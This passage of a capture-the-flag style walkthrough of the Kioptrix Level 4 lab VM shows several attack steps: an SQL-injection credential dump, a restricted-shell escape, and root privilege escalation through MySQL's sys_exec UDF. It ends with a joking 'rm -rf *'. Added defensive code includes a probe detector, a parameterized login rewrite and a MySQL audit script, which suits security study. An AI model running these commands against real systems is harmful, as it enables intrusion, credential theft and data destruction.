[09:52:26] [INFO] fetching entries of column(s) 'id,password,username' for table 'members' in database 'members'
[09:52:26] [INFO] fetching number of column(s) 'id,password,username' entries for table 'members' in database 'members'
[09:52:26] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:52:26] [INFO] retrieved: 2
[09:52:26] [INFO] retrieved: 1
[09:52:26] [INFO] retrieved: MyNameIsJohn
[09:52:27] [INFO] retrieved: john
[09:52:27] [INFO] retrieved: 2
[09:52:27] [INFO] retrieved: ADGAds
[09:52:28] [INFO] retrieved: 
[09:52:28] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)                                                                        
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[09:52:33] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
[09:52:43] [INFO] adjusting time delay to 1 second due to good response times
robert
Database: members
Table: members
[2 entries]
+----+----------+--------------+
| id | username | password     |
+----+----------+--------------+
| 1  | john     | MyNameIsJohn |
| 2  | robert   | ADGAds       |
+----+----------+--------------+

Usernames and passwords obtained:

Username    Password
john        MyNameIsJohn
robert      ADGAds
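The root cause behind section 3.1 and its fix, as an added example that is not code from the original post or from the Kioptrix VM: the checklogin.php source is not shown on the page, so the string-concatenated query below is an assumption reproducing the pattern sqlmap's findings imply (mypassword spliced into SQL text), SQLite stands in for MySQL, and the probe detector is keyed on the payload shapes sqlmap reported above.

```python
"""Vulnerable vs. parameterized login check, plus a detector for sqlmap-style probes."""
import re
import sqlite3
from urllib.parse import parse_qs

# Rows mirroring the members table dumped in 3.1.6 (id, username, password).
MEMBERS = [(1, "john", "MyNameIsJohn"), (2, "robert", "ADGAds")]

# Constructed POST bodies: the two payloads sqlmap reported, and a normal login.
BODY_BOOLEAN_BLIND = ("myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) "
                      "THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=Login")
BODY_TIME_BLIND = ("myusername=admin&mypassword=123456' AND (SELECT 1417 FROM "
                   "(SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login")
BODY_BENIGN = "myusername=admin&mypassword=123456&Submit=Login"


def make_db():
    """In-memory members table with the schema sqlmap enumerated in 3.1.5."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE members (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO members VALUES (?, ?, ?)", MEMBERS)
    return con


def login_vulnerable(con, username, password):
    """ASSUMED vulnerable pattern: form values concatenated into the SQL text.

    Returns True for exactly one matching row, False for none, and None when
    the statement fails to parse. Three distinguishable outcomes is exactly the
    oracle a boolean-based blind injection needs (sqlmap's --not-string="28").
    """
    sql = (f"SELECT id FROM members WHERE username='{username}' "
           f"AND password='{password}'")
    try:
        return len(con.execute(sql).fetchall()) == 1
    except sqlite3.Error:
        return None


def login_safe(con, username, password):
    """Hardened form: bound parameters, so the password is compared as data."""
    rows = con.execute(
        "SELECT id FROM members WHERE username=? AND password=?",
        (username, password),
    ).fetchall()
    return len(rows) == 1


# Tokens present in the payloads sqlmap reported against mypassword.
PROBE_PATTERNS = [
    re.compile(r"'\s*(AND|OR)\s", re.I),   # quote break followed by a boolean operator
    re.compile(r"\bCASE\s+WHEN\b", re.I),  # boolean-blind CASE oracle
    re.compile(r"\bSLEEP\s*\(", re.I),     # time-based blind delay
    re.compile(r"\bUNION\s+SELECT\b", re.I),
    re.compile(r"--\s"),                   # trailing comment that swallows the closing quote
]


def parse_form(body):
    """x-www-form-urlencoded body -> dict of first values (splits on the first '=' only)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def flag_probe(body):
    """Return the login fields whose value matches an injection pattern (empty if none)."""
    fields = parse_form(body)
    return sorted(
        name for name in ("myusername", "mypassword")
        if any(p.search(fields.get(name, "")) for p in PROBE_PATTERNS)
    )


if __name__ == "__main__":
    db = make_db()
    # An injected condition changes the vulnerable query's outcome; the safe one
    # treats the whole string as a (wrong) password and always returns False.
    for pw in ("MyNameIsJohn", "MyNameIsJohn' AND 1=1-- -", "MyNameIsJohn' AND 1=2-- -"):
        print(repr(pw), login_vulnerable(db, "john", pw), login_safe(db, "john", pw))
    for body in (BODY_BOOLEAN_BLIND, BODY_TIME_BLIND, BODY_BENIGN):
        print(flag_probe(body), body[:60])
```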

3.2 Shell escape

3.2.1 SSH login

Xshell 7 (Build 0063)
Copyright (c) 2020 NetSarang Computer, Inc. All rights reserved.

Type `help' to learn how to use Xshell prompt.
[C:\~]$ ssh john@192.168.1.6

Connecting to 192.168.1.6:22...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.

WARNING! The remote SSH server rejected X11 forwarding request.
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ 

Shell login successful.

3.2.2 Shell escape

Xshell 7 (Build 0063)
Copyright (c) 2020 NetSarang Computer, Inc. All rights reserved.

Type `help' to learn how to use Xshell prompt.
[C:\~]$ ssh john@192.168.1.6

Connecting to 192.168.1.6:22...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.

WARNING! The remote SSH server rejected X11 forwarding request.
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ 

Escaped the restricted shell successfully.

3.3 MySQL UDF privilege escalation

3.3.1 Inspecting running services

john@Kioptrix4:~$ ps -ef
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 16:22 ?        00:00:03 /sbin/init
root         2     0  0 16:22 ?        00:00:00 [kthreadd]
root         3     2  0 16:22 ?        00:00:00 [migration/0]
root         4     2  0 16:22 ?        00:00:00 [ksoftirqd/0]
root         5     2  0 16:22 ?        00:00:00 [watchdog/0]
root         6     2  0 16:22 ?        00:00:00 [migration/1]
root         7     2  0 16:22 ?        00:00:00 [ksoftirqd/1]
root         8     2  0 16:22 ?        00:00:00 [watchdog/1]
root         9     2  0 16:22 ?        00:00:00 [events/0]
root        10     2  0 16:22 ?        00:00:00 [events/1]
root        11     2  0 16:22 ?        00:00:00 [khelper]
root        46     2  0 16:22 ?        00:00:00 [kblockd/0]
root        47     2  0 16:22 ?        00:00:00 [kblockd/1]
root        50     2  0 16:22 ?        00:00:00 [kacpid]
root        51     2  0 16:22 ?        00:00:00 [kacpi_notify]
root       247     2  0 16:22 ?        00:00:00 [kseriod]
root       291     2  0 16:22 ?        00:00:00 [pdflush]
root       292     2  0 16:22 ?        00:00:00 [pdflush]
root       293     2  0 16:22 ?        00:00:00 [kswapd0]
root       335     2  0 16:22 ?        00:00:00 [aio/0]
root       336     2  0 16:22 ?        00:00:00 [aio/1]
root      1742     2  0 16:22 ?        00:00:00 [ksuspend_usbd]
root      1746     2  0 16:22 ?        00:00:00 [khubd]
root      2180     2  0 16:22 ?        00:00:00 [ata/0]
root      2181     2  0 16:22 ?        00:00:00 [ata/1]
root      2185     2  0 16:22 ?        00:00:00 [ata_aux]
root      2629     2  0 16:22 ?        00:00:00 [scsi_eh_0]
root      2657     2  0 16:22 ?        00:00:00 [scsi_eh_1]
root      2658     2  0 16:22 ?        00:00:00 [scsi_eh_2]
root      2659     2  0 16:22 ?        00:00:00 [scsi_eh_3]
root      2660     2  0 16:22 ?        00:00:00 [scsi_eh_4]
root      2661     2  0 16:22 ?        00:00:00 [scsi_eh_5]
root      2662     2  0 16:22 ?        00:00:00 [scsi_eh_6]
root      2663     2  0 16:22 ?        00:00:00 [scsi_eh_7]
root      2664     2  0 16:22 ?        00:00:00 [scsi_eh_8]
root      2665     2  0 16:22 ?        00:00:00 [scsi_eh_9]
root      2666     2  0 16:22 ?        00:00:00 [scsi_eh_10]
root      2667     2  0 16:22 ?        00:00:00 [scsi_eh_11]
root      2668     2  0 16:22 ?        00:00:00 [scsi_eh_12]
root      2669     2  0 16:22 ?        00:00:00 [scsi_eh_13]
root      2670     2  0 16:22 ?        00:00:00 [scsi_eh_14]
root      2671     2  0 16:22 ?        00:00:00 [scsi_eh_15]
root      2672     2  0 16:22 ?        00:00:00 [scsi_eh_16]
root      2673     2  0 16:22 ?        00:00:00 [scsi_eh_17]
root      2674     2  0 16:22 ?        00:00:00 [scsi_eh_18]
root      2675     2  0 16:22 ?        00:00:00 [scsi_eh_19]
root      2676     2  0 16:22 ?        00:00:00 [scsi_eh_20]
root      2677     2  0 16:22 ?        00:00:00 [scsi_eh_21]
root      2678     2  0 16:22 ?        00:00:00 [scsi_eh_22]
root      2679     2  0 16:22 ?        00:00:00 [scsi_eh_23]
root      2680     2  0 16:22 ?        00:00:00 [scsi_eh_24]
root      2681     2  0 16:22 ?        00:00:00 [scsi_eh_25]
root      2682     2  0 16:22 ?        00:00:00 [scsi_eh_26]
root      2683     2  0 16:22 ?        00:00:00 [scsi_eh_27]
root      2684     2  0 16:22 ?        00:00:00 [scsi_eh_28]
root      2685     2  0 16:22 ?        00:00:00 [scsi_eh_29]
root      2686     2  0 16:22 ?        00:00:00 [scsi_eh_30]
root      2990     2  0 16:22 ?        00:00:00 [scsi_eh_31]
root      2992     2  0 16:22 ?        00:00:00 [scsi_eh_32]
root      3287     2  0 16:22 ?        00:00:00 [kjournald]
root      3458     1  0 16:22 ?        00:00:00 /sbin/udevd --daemon
root      3805     2  0 16:22 ?        00:00:00 [kgameportd]
root      4103     2  0 16:22 ?        00:00:00 [kpsmoused]
root      5400     1  0 16:22 tty4     00:00:00 /sbin/getty 38400 tty4
root      5401     1  0 16:22 tty5     00:00:00 /sbin/getty 38400 tty5
root      5408     1  0 16:22 tty2     00:00:00 /sbin/getty 38400 tty2
root      5410     1  0 16:22 tty3     00:00:00 /sbin/getty 38400 tty3
root      5413     1  0 16:22 tty6     00:00:00 /sbin/getty 38400 tty6
syslog    5449     1  0 16:22 ?        00:00:00 /sbin/syslogd -u syslog
root      5468     1  0 16:22 ?        00:00:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
klog      5470     1  0 16:22 ?        00:00:00 /sbin/klogd -P /var/run/klogd/kmsg
root      5489     1  0 16:22 ?        00:00:00 /usr/sbin/sshd
root      5545     1  0 16:22 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe
root      5587  5545  0 16:22 ?        00:00:04 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
root      5588  5545  0 16:22 ?        00:00:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
root      5662     1  0 16:22 ?        00:00:00 /usr/sbin/nmbd -D
root      5664     1  0 16:22 ?        00:00:00 /usr/sbin/smbd -D
root      5678  5664  0 16:22 ?        00:00:00 /usr/sbin/smbd -D
root      5679     1  0 16:22 ?        00:00:00 /usr/sbin/winbindd
root      5683  5679  0 16:22 ?        00:00:00 /usr/sbin/winbindd
daemon    5700     1  0 16:22 ?        00:00:00 /usr/sbin/atd
root      5711     1  0 16:22 ?        00:00:00 /usr/sbin/cron
root      5733     1  0 16:22 ?        00:00:00 /usr/sbin/apache2 -k start
dhcp      5783     1  0 16:22 ?        00:00:00 dhclient eth1
root      5790     1  0 16:22 tty1     00:00:00 /sbin/getty 38400 tty1
root      5806  5679  0 16:34 ?        00:00:00 /usr/sbin/winbindd
root      5807  5679  0 16:34 ?        00:00:00 /usr/sbin/winbindd
www-data  6714  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  6715  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  6716  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  6717  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  6718  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  6719  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  6720  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
root      6729  5489  0 17:58 ?        00:00:00 sshd: john [priv]
john      6731  6729  0 17:58 ?        00:00:00 sshd: john@pts/0 
john      6732  6731  0 17:58 pts/0    00:00:00 python /bin/kshell
john      6733  6732  0 18:02 pts/0    00:00:00 sh -c /bin/bash
john      6734  6733  0 18:02 pts/0    00:00:00 /bin/bash
john      6753  6734  0 18:05 pts/0    00:00:00 ps -ef

The process list confirms that mysqld was started as root (note the --user=root flag), so we will try to escalate privileges through MySQL.

3.3.2 Locating PHP files

john@Kioptrix4:~$ find /var/www -name *.php
/var/www/login_success.php
/var/www/index.php
/var/www/member.php
/var/www/checklogin.php
/var/www/logout.php
/var/www/robert/robert.php
/var/www/john/john.php

3.3.3 Reading the PHP source

john@Kioptrix4:~$ cat /var/www/checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name

// Connect to server and select database.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");

// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];

// To protect MySQL injection (more detail about MySQL injection)
$myusername = stripslashes($myusername);
//$mypassword = stripslashes($mypassword);
$myusername = mysql_real_escape_string($myusername);
//$mypassword = mysql_real_escape_string($mypassword);

//$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
$result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");
//$result=mysql_query($sql);

// Mysql_num_row is counting table row
$count=mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row
if($count!=0){
// Register $myusername, $mypassword and redirect to file "login_success.php"
session_register("myusername");
session_register("mypassword");
header("location:login_success.php?username=$myusername");
}
else {
echo "Wrong Username or Password";
print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>');
}
ob_end_flush();
?>

The web application connects to MySQL as root with an empty password.
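The source above shows why the login form was injectable: `$mypassword` is interpolated straight into the query (its escaping line is commented out), and the whole check relies on string escaping plus plaintext passwords in the table. The rewrite below is an added example for this write-up, not the file shipped on the Kioptrix VM and not the box author's code. It assumes things the original page does not have: a current PHP (7 or later) and MySQL build, a dedicated low-privilege MySQL account `webapp` with SELECT on `members.members` only, its password supplied in the environment variable `MEMBERS_DB_PASS`, and a `password` column that stores `password_hash()` output instead of plaintext.

```php
<?php
// Hardened rewrite of checklogin.php: added example, not the original Kioptrix file.
// Assumptions (not on the original page): a MySQL account "webapp" with SELECT on
// members.members only, its password in the MEMBERS_DB_PASS environment variable,
// and a members.password column holding password_hash() output.
session_start();

$dsn    = 'mysql:host=localhost;dbname=members;charset=utf8mb4';
$dbUser = 'webapp';                        // assumption: least-privilege account, not root
$dbPass = getenv('MEMBERS_DB_PASS') ?: ''; // assumption: secret is not hard-coded in the source

try {
    $pdo = new PDO($dsn, $dbUser, $dbPass, [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
    ]);
} catch (PDOException $e) {
    error_log('checklogin: DB connection failed: ' . $e->getMessage());
    http_response_code(500);
    exit('Service unavailable');
}

$myusername = (string)($_POST['myusername'] ?? '');
$mypassword = (string)($_POST['mypassword'] ?? '');

// The query text is fixed and the input travels as a bound parameter, so a
// value such as  ' or 1=1 --  is compared as a literal string rather than
// parsed as SQL. No escaping function is involved at all.
$stmt = $pdo->prepare('SELECT id, username, password FROM members WHERE username = ? LIMIT 1');
$stmt->execute([$myusername]);
$row = $stmt->fetch(PDO::FETCH_ASSOC);

// Verify against the stored hash instead of selecting on the plaintext
// password, so the database never holds or compares plaintext credentials.
if ($row !== false && password_verify($mypassword, $row['password'])) {
    session_regenerate_id(true);           // fresh session id after authentication
    $_SESSION['user_id']  = (int)$row['id'];
    $_SESSION['username'] = $row['username'];
    // The original echoed the username back into the URL; keep it server-side instead.
    header('Location: login_success.php');
    exit;
}

http_response_code(401);
echo 'Wrong Username or Password';
print('<form method="get" action="index.php"><input type="submit" value="Try Again"></form>');
```

Rows for this version are created with `password_hash($plaintext, PASSWORD_DEFAULT)`. The original's `session_register()` was removed in PHP 5.4, which is why the rewrite stores values in `$_SESSION` directly.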

3.3.4 Logging in to MySQL

john@Kioptrix4:~$ mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 6258
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> 

Login successful.

3.3.5 Checking the UDF table

mysql> SELECT * FROM mysql.func;
+-----------------------+-----+---------------------+----------+
| name                  | ret | dl                  | type     |
+-----------------------+-----+---------------------+----------+
| lib_mysqludf_sys_info |   0 | lib_mysqludf_sys.so | function | 
| sys_exec              |   0 | lib_mysqludf_sys.so | function | 
+-----------------------+-----+---------------------+----------+
2 rows in set (0.00 sec)

The mysql.func table shows that the lib_mysqludf_sys library is already registered, with sys_exec available.
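Three conditions made this escalation possible: mysqld running as root (3.3.1), a root account with an empty password (3.3.3 and 3.3.4), and a command-execution UDF already registered (3.3.5). The script below is an added example, not part of the original walkthrough or the VM, that audits a MySQL server for those conditions using the same PDO API as the hardened login page. It assumes it is run from the CLI by an administrator whose account can read the `mysql` schema, MySQL 5.0 to 5.6 column names (`mysql.user.Password`) with a fallback for 5.7 and later (`authentication_string`), and placeholder connection values that must be replaced.

```php
<?php
// Added example (not from the original page): audit a MySQL server for
// registered UDFs, empty-password accounts, over-privileged accounts and
// a root connection. Assumptions: run as an administrator from the CLI;
// MySQL 5.0-5.6 schema (Password column), with a 5.7+ fallback.

function connectMysql(string $host, string $user, string $pass): PDO
{
    return new PDO(
        "mysql:host=$host;dbname=mysql;charset=utf8",
        $user,
        $pass,
        [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION, PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC]
    );
}

/** Returns human-readable findings; an empty array means nothing was flagged. */
function auditMysql(PDO $pdo): array
{
    $findings = [];

    // 1. UDFs loaded from shared objects. lib_mysqludf_sys provides sys_exec(),
    //    which runs OS commands with the privileges of the mysqld process.
    foreach ($pdo->query('SELECT name, dl FROM mysql.func') as $f) {
        $findings[] = sprintf('UDF registered: %s (library %s)', $f['name'], $f['dl']);
    }

    // 2. Accounts with an empty password, and anonymous accounts.
    try {
        $rows = $pdo->query("SELECT User, Host FROM mysql.user WHERE Password = '' OR User = ''")->fetchAll();
    } catch (PDOException $e) {
        // MySQL 5.7+ replaced the Password column with authentication_string
        $rows = $pdo->query("SELECT User, Host FROM mysql.user WHERE authentication_string = '' OR User = ''")->fetchAll();
    }
    foreach ($rows as $r) {
        $findings[] = sprintf("Empty password or anonymous account: '%s'@'%s'", $r['User'], $r['Host']);
    }

    // 3. Accounts that can write server files or insert into mysql.func, i.e. register UDFs.
    $sql = "SELECT User, Host FROM mysql.user WHERE File_priv = 'Y' OR Super_priv = 'Y' OR Insert_priv = 'Y'";
    foreach ($pdo->query($sql) as $r) {
        $findings[] = sprintf("Account with FILE, SUPER or global INSERT: '%s'@'%s'", $r['User'], $r['Host']);
    }

    // 4. Is this connection root? Run the audit with the credentials taken from the
    //    application's config file to catch a checklogin.php-style setup.
    $current = (string)$pdo->query('SELECT CURRENT_USER()')->fetchColumn();
    if (strpos($current, 'root@') === 0) {
        $findings[] = "Connected as $current; the application should use a least-privilege account";
    }

    return $findings;
}

if (PHP_SAPI === 'cli') {
    // Placeholders: substitute the values found in the application's config.
    $pdo      = connectMysql('localhost', 'root', '');
    $findings = auditMysql($pdo);
    echo $findings ? implode(PHP_EOL, $findings) . PHP_EOL : 'No findings' . PHP_EOL;
}
```

On the box as shown, every check would fire. The corresponding fixes are the standard ones: drop the function with `DROP FUNCTION sys_exec;` and remove the library from the plugin directory if it is not needed, set a password for root, give the web application its own account with SELECT on `members.members` only, and start mysqld with `user=mysql` in my.cnf rather than `--user=root` so a UDF cannot hand out root shells even if one is registered.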

3.3.6 Adding john to the admin group

Use the sys_exec() function to add user john to the admin group.

mysql> select sys_exec('usermod -a -G admin john '); 
+---------------------------------------+
| sys_exec('usermod -a -G admin john ') |
+---------------------------------------+
| NULL                                  | 
+---------------------------------------+
1 row in set (0.04 sec)

User added to the group successfully.

3.3.7 Switching to root

The password is MyNameIsJohn.

john@Kioptrix4:~$ sudo su
[sudo] password for john: 
root@Kioptrix4:/home/john# 
root@Kioptrix4:/home/john# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/home/john# whoami
root

At this point we have root privileges, O(∩_∩)O haha~ time for rm -rf *.

3.3.8 Flag

root@Kioptrix4:/home/john# cd /root
root@Kioptrix4:~# ls
congrats.txt  lshell-0.9.12
root@Kioptrix4:~# cat congrats.txt
Congratulations!
You've got root.

There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.

It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.

If you haven't already, check out the other VMs available on:
www.kioptrix.com

Thanks for playing,
loneferret

This concludes the penetration test of this target.


Summary

This Kioptrix Level #4 penetration test covered host discovery (nmap/netdiscover), port scanning (nmap/masscan), directory scanning (dirb/dirsearch), SQL injection, and system privilege escalation through a MySQL UDF:

  • Host discovery
  • Directory scanning
  • Port scanning
  • SQL injection
  • Shell escape
  • UDF privilege escalation
